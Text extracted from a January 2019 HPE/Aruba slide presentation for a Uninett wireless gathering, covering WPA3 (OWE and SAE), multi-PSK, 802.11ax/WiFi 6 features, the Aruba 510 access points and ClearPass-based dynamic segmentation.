View
5
Download
0
Category
Preview:
Citation preview
2
Agenda Uninett trådløs samling 2019
•WPA3•mPSK•802.11ax•WiFi 6 hardware•Dynamic Segmentation
WPA3Anders Lagerqvistanders@hpe.com
Januar 2019
4
Why WPA3– WPA2 is past retirement
– WPA2-Personal is vulnerable to brute force and dictionary attacks, if the key used is short.
– WPA2-enterprise is still solid security-wise, but is susceptible to deauth attacks
– WPA3 is a Wi-Fi Alliance effort to address these issues.
– WPA3 Addresses the KRACK vulnerability
WPA3
OPPORTUNISTIC WIRELESS ENCRYPTION (OWE)
WPA3 OWE: What is It?– Evolutionary advance of wireless security
– Fix flaws, improve robustness, provide more options to cover more use cases
– Open gets replaced by OWE– Opportunistic Wireless Encryption– Problem: all wireless traffic is passed in the clear– Solution: all wireless traffic gets encrypted– Too many captive portals still use Open
WPA3
SIMULTANEOUS AUTHENTICATION OF EQUALS (SAE)
WPA3: Uses PSK/passwords properly– Problem with WPA2-PSK: off-line dictionary attack
– Attacker witnesses 4-way handshake– Runs through all possible passwords– up to 400,000 per second– to find right one
– WPA2-PSK is replaced by SAE (802.11-2016, section 12.4)– Originally intended for mesh security– Password-based authentication– Resistant to active, passive, and dictionary attack
– SAE uses 802.11 authentication frames– Authentication generates a PMK, association indicates the PMKID– Post-association 4-way handshake generates traffic encryption keys
– Provisioning is identical to WPA2-PSK– User enters password just like always but under the covers gets bullet-proof security
mPSKAnders Lagerqvistanders@hpe.com
Januar 2019
mPSK: What is It?
– mPSK can design the network with different passphrase per device or group.
– Radius-server need to verify the MAC address of client in its database or user-tables and send Encrypted Passphrase to controller with Aruba VSA (Aruba-mPSK-Passphrase)
Note: It´s common and in many cases a best practice to use MAC auth also on regular PSK today to profile clients and assign different roles or VLAN´s, but it´s not mandatory.
opmode PSK mPSKPassphrase 1 many
Radius Server No mac Auth
802.11axAnders Lagerqvistanders@hpe.com
Januar 2019
12
What is 802.11ax?
– 802.11ax is the new IEEE standard for Wi-Fi, aka WiFi 6
– 802.11n and 802.11ac were designed to improve Wi-Fi performance while 802.11ax is aimed at optimizing efficiency and solving problems in high density environments
– With the previous generation of standards, the focus was on enhancing the peak data rate, but with 802.11ax it’s all about maximizing capacity and ensuring that all devices in a crowded network get the bandwidth they require
13
802.11ax technology
Increase 4x average throughput per device in a dense deployment scenario
Enhanced operation in 2.4 & 5 GHz bands (802.11ac was only 5 GHz)
Improve power efficiency of client devices
Improve performance of outdoor and indoor networks
14
802.11ax compared with .11n and .11ac
• 2.4 and 5 GHz
• Wider channels (40 MHz)
• Higher rates (64-QAM)
• Additional streams (up to 4)
• Beam forming (explicit and
implicit)
• Backwards compatibility with
11a/b/g
• 5 GHz only
• Even wider channels (80, 160
MHz)
• Higher rates (256-QAM)
• Additional streams (up to 8)
• Beam forming (explicit)
• Multi-user MIMO
• Backwards compatibility with
11a/b/g/n
• 2.4 GHz and 5 GHz
• Higher rates (1024-QAM)
• Multi-user MIMO, 8 clients
• OFDMA uplink and downlink
• Better battery life (Target Wait
Time)
• Spatial re-use (BSS color) for
higher density networks
• Enhanced outdoor long-range
performance
• Backwards compatibility with
11a/b/g/n/ac
802.11n(2008)High Throughput
802.11ac (2012)Very High Throughput
802.11ax (2018)High Efficiency
15
Uplink Multi User-MIMO
APClient
11n/ac UL SU-MIMO
h11
h12
h21
h22
APx1
x2
y1
y2
Clients 11ax UL MU-MIMO
x1
x2
h11
h12
h21
h22
y1
y2
!" = $% 2 ℎ""(" + $% 2 ℎ"*(* + +"
!* = $% 2 ℎ*"(" + $% 2 ℎ**(* + +*
• UL MU-MIMO is mathematically equivalent to UL SU-MIMO
• Why not included in 11ac? To maintain mathematical equivalency in practice requires time
synchronization, frequency alignment, and power normalization between all clients in an MU group
• Protocol to address this has been added to 11ax for both UL OFDMA and MU-MIMO (trigger frame)
WiFi 6 hardwareAnders Lagerqvistanders@hpe.com
Januar 2019
Introducing: Aruba 510 Series Campus Access Points
Product Introduction – 510 Series Campus Access Points
– High-level, what are we introducing– 802.11ax, first of many, portfolio fit
– AP product overview, specifications– Critical features, capabilities (802.11ax, Green AP, IPM, Zigbee)– Power consumption
Product Introduction – 510 Series Campus Access Points
– Zigbee:– New AP platform integrates with common building systems:
– Ventilation– Lights– Doors– Elevators– Minibars
NetNordic is deploying The Hub hotel in Oslo with Aruba WiFi and Zigbee and expect to save around 2M NOK since they won´t need a secondary Zigbee network.
DynamicSegmentationTore Henriksentore.henriksen@hpe.com
Januar 2019
Understanding Device & IoT Connectivity Options
Customers want to managewhat devices connect
Only some support secure connections
50% of IoT may bewired
• ClearPass supports any customer infrastructure and need
Visibility – the first step
SOFTWARE CONTROLS FOR “COLORLESS” PORTS
Device and user identity
stores
Ports assigned to new VLANs through ClearPass
based on device type
IoT devices on the wired network
connecting to any portPrevention against malware
and insider threats
Secure per device tunneling to Aruba Mobility Controller
Arubaswitches
25
User-Based Tunnel: What is it?• UBT uses the concept of a colorless access port
• It doesn’t matter what you connect to the port• Roles and policies are assigned per device
• Authentication takes place at the access port level• Successful authentication enforces VLAN and ACL assignments• Can create a user or device-based tunnel to the Mobility Controller• Mobility Controller can enforce additional security
Aruba Mobility
ControllerCore Switch
Access SwitchClearPass
IoT (Device Profiling)
Captive Portal
802.1X
IP Phone (MAC-Auth)
user/role device type / health
locationtime / day
Enforce A Per Device Policy
DEMO
Recommended